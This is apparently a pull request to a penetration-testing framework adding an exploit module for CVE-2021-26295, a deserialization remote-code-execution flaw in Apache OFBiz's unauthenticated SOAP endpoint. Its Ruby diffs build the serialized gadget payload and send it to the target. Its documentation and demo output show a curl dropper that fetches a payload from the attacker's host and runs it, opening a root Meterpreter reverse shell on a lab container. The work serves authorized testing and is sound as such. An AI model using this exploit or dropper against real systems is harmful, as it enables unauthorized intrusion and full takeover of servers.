### PR TITLE
Add exploit for CVE-2021-26295 Apache OFBiz Deserialization RCE

### DIFF
--- a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialization_soap.md
+++ b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialization_soap.md
@@ -1,0 +1,95 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a Java deserialization vulnerability in Apache
+OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for
+versions prior to 17.12.06.
+
+### Setup
+
+You can use <https://hub.docker.com/r/opensourceknight/ofbiz>.
+
+1. Initialize the database with demo data (`INIT_DB=2`) and bind to ports 8080 and 8443
+    * `docker run -p 8080:8080 -p 8443:8443  --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Scenarios
+
+### Apache OFBiz from [Docker](#setup).
+
+```
+msf6 > use exploit/linux/http/apache_ofbiz_deserialization_soap 
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > options
+
+Module options (exploit/linux/http/apache_ofbiz_deserialization_soap):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.128  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8443             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8081             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. Target can deserialize arbitrary data.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://0.0.0.0:8081/qL5QfV
+[*] Local IP: http://192.168.250.87:8081/qL5QfV
+[*] Client 172.17.0.2 (curl/7.38.0) requested /qL5QfV
+[*] Sending payload to 172.17.0.2 (curl/7.38.0)
+[+] Successfully executed command: curl -so /tmp/wHwoartY http://192.168.159.128:8081/qL5QfV;chmod +x /tmp/wHwoartY;/tmp/wHwoartY;rm -f /tmp/wHwoartY
+[*] Sending stage (3012516 bytes) to 172.17.0.2
+[*] Command Stager progress - 100.00% done (114/114 bytes)
+[*] Meterpreter session 9 opened (192.168.159.128:4444 -> 172.17.0.2:47186) at 2021-03-30 17:13:01 -0400
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root @ bac44466b17e (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 8.4 (Linux 5.10.22-100.fc32.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

--- a/lib/msf/core/opt_condition.rb
+++ b/lib/msf/core/opt_condition.rb
@@ -32,7 +32,9 @@ module Msf
         left_value = mod.datastore[left_source] || opt.default
       end
 
-      eval_condition(left_value, operator, right_value)
+      show = eval_condition(left_value, operator, right_value)
+      show ||= eval_condition(left_value.to_s, operator, right_value) if left_value.is_a?(Symbol)
+      show
     end
 
   end

--- a/modules/exploits/linux/http/apache_ofbiz_deserialization.rb
+++ b/modules/exploits/linux/http/apache_ofbiz_deserialization.rb
@@ -55,7 +55,6 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'linux',
               'Arch' => [ARCH_X86, ARCH_X64],
               'Type' => :linux_dropper,
-              'CmdStagerFlavor' => %i[bourne curl wget],
               'DefaultOptions' => {
                 'CMDSTAGER::FLAVOR' => :curl,
                 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'

--- a/modules/exploits/linux/http/apache_ofbiz_deserialization_soap.rb
+++ b/modules/exploits/linux/http/apache_ofbiz_deserialization_soap.rb
@@ -29,12 +29,13 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'yumusb',           # original PoC
-          'Spencer McIntyre'  # metasploit module
+          'Spencer McIntyre', # metasploit module
+          'wvu'               # metasploit module
         ],
         'References' => [
           [ 'CVE', '2021-26295' ],
           [ 'URL', 'https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py' ],
-          [ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12212' ],
+          [ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12167' ],
         ],
         'DisclosureDate' => '2021-03-22', # NVD publish date
         'License' => MSF_LICENSE,
@@ -59,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'linux',
               'Arch' => [ARCH_X86, ARCH_X64],
               'Type' => :linux_dropper,
-              'CmdStagerFlavor' => %i[bourne curl wget],
               'DefaultOptions' => {
                 'CMDSTAGER::FLAVOR' => :curl,
                 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
                     <cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj>
                   </map-Key>
                   <map-Value>
-                    <std-String value="http://baidu.com"/>
+                    <std-String value="http://#{Faker::Internet.domain_name}"/>
                   </map-Value>
                 </map-Entry>
               </map-HashMap>

--- a/modules/exploits/linux/http/apache_ofbiz_deserialization_soap.rb
+++ b/modules/exploits/linux/http/apache_ofbiz_deserialization_soap.rb
@@ -12,27 +12,31 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
   include Msf::Exploit::JavaDeserialization
 
+  XML_NS = {
+    'serResponse' => 'http://ofbiz.apache.org/service/',
+    'soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/'
+  }.freeze
+
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Apache OFBiz XML-RPC Java Deserialization',
+        'Name' => 'Apache OFBiz SOAP Java Deserialization',
         'Description' => %q{
           This module exploits a Java deserialization vulnerability in Apache
-          OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
-          versions prior to 17.12.04.
+          OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for
+          versions prior to 17.12.06.
         },
         'Author' => [
-          'Alvaro Muñoz', # Discovery
-          'wvu' # Exploit
+          'yumusb',           # original PoC
+          'Spencer McIntyre'  # metasploit module
         ],
         'References' => [
-          ['CVE', '2020-9496'],
-          ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz'],
-          ['URL', 'https://ofbiz.apache.org/release-notes-17.12.04.html'],
-          ['URL', 'https://issues.apache.org/jira/browse/OFBIZ-11716']
+          [ 'CVE', '2021-26295' ],
+          [ 'URL', 'https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py' ],
+          [ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12212' ],
         ],
-        'DisclosureDate' => '2020-07-13', # Vendor release note
+        'DisclosureDate' => '2021-03-22', # NVD publish date
         'License' => MSF_LICENSE,
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
@@ -83,13 +87,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     # Send an empty serialized object
-    res = send_request_xmlrpc('')
+    res = send_request_soap('')
 
     unless res
       return CheckCode::Unknown('Target did not respond to check.')
     end
 
-    if res.body.include?('Failed to read result object: null')
+    messages = {}
+    res.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry|
+      key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s
+      messages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s
+    end
+
+    if messages['errorMessage']&.start_with?('Problem deserializing object from byte array')
       return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
     end
 
@@ -110,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}")
 
-    res = send_request_xmlrpc(
+    res = send_request_soap(
       # framework/webapp/lib/rome-0.9.jar
       generate_java_deserialization_for_command('ROME', 'bash', cmd)
     )
@@ -122,32 +132,29 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("Successfully executed command: #{cmd}")
   end
 
-  def send_request_xmlrpc(data)
-    # http://xmlrpc.com/
-    # https://ws.apache.org/xmlrpc/
+  def send_request_soap(data)
     send_request_cgi(
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, '/webtools/control/xmlrpc'),
+      'uri' => normalize_uri(target_uri.path, '/webtools/control/SOAPService'),
       'ctype' => 'text/xml',
       'data' => <<~XML
-        <?xml version="1.0"?>
-        <methodCall>
-          <methodName>#{rand_text_alphanumeric(8..42)}</methodName>
-          <params>
-            <param>
-              <value>
-                <struct>
-                  <member>
-                    <name>#{rand_text_alphanumeric(8..42)}</name>
-                    <value>
-                      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">#{Rex::Text.encode_base64(data)}</serializable>
-                    </value>
-                  </member>
-                </struct>
-              </value>
-            </param>
-          </params>
-        </methodCall>
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+          <soapenv:Header/>
+          <soapenv:Body>
+            <ser>
+              <map-HashMap>
+                <map-Entry>
+                  <map-Key>
+                    <cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj>
+                  </map-Key>
+                  <map-Value>
+                    <std-String value="http://baidu.com"/>
+                  </map-Value>
+                </map-Entry>
+              </map-HashMap>
+            </ser>
+          </soapenv:Body>
+        </soapenv:Envelope>
       XML
     )
   end


### PR DESCRIPTION
This adds an exploit for CVE-2021-26295 which is an unauthenticated Java Deserialization that leads to RCE on an Apache OFBiz instance. The vulnerability is due to a SOAP API endpoint that is unauthenticated.

Tested using OFBiz versions:

* [ 15.12](https://hub.docker.com/r/opensourceknight/ofbiz)
* [16.11.01](https://hub.docker.com/r/marcopinball/ofbiz-demo)
* Which ever version the official one is: https://hub.docker.com/r/ofbiz/full-trunk

The steps for this are in the README, it's super simple using docker: `docker run -p 8080:8080 -p 8443:8443  --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`

A couple of other things I tweaked:
* ~~Added `bourne` as an available CMD stager type to the original `exploit/linux/http/apache_ofbiz_deserialization` module and tested it using version 15.12 for the [opensourceknight/ofbiz](https://hub.docker.com/r/opensourceknight/ofbiz) docker image.~~ [Removed](https://github.com/rapid7/metasploit-framework/pull/14971#discussion_r604486785) the `CmdStagerFlavor` allow list within the module metadata that limited the available stagers and tested the `bourne` flavor. There's no reason that I can tell that only `curl` and `wget` should be usable, since the vulnerability doesn't have any constraints that would limit that as far as I'm aware.
* Updated the `Msf::OptCondition.show_option` method to convert the left side value to a string when it's a symbol since all of the usages are comparing it to strings. This fixes a bug in both of the Apache OFBiz Deserialization exploits that was preventing the `SRVHOST` option from showing up because the `CMDSTAGER::FLAVOR` option was using a symbol for the value. Probably makes sense to consistently compare these as strings.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/apache_ofbiz_deserialization_soap`
- [ ] Set the options as necessary, there's nothing special here
- [ ] Run `check`, see that the target is vulnerable
- [ ] Run `exploit`, see that the target is exploitable


## Demo

```
msf6 > use exploit/linux/http/apache_ofbiz_deserialization_soap 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > options
Module options (exploit/linux/http/apache_ofbiz_deserialization_soap):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.128  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8081             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   1   Linux Dropper
msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8081/qL5QfV
[*] Local IP: http://192.168.250.87:8081/qL5QfV
[*] Client 172.17.0.2 (curl/7.38.0) requested /qL5QfV
[*] Sending payload to 172.17.0.2 (curl/7.38.0)
[+] Successfully executed command: curl -so /tmp/wHwoartY http://192.168.159.128:8081/qL5QfV;chmod +x /tmp/wHwoartY;/tmp/wHwoartY;rm -f /tmp/wHwoartY
[*] Sending stage (3012516 bytes) to 172.17.0.2
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Meterpreter session 9 opened (192.168.159.128:4444 -> 172.17.0.2:47186) at 2021-03-30 17:13:01 -0400
[*] Server stopped.
meterpreter > getuid
Server username: root @ bac44466b17e (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 8.4 (Linux 5.10.22-100.fc32.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```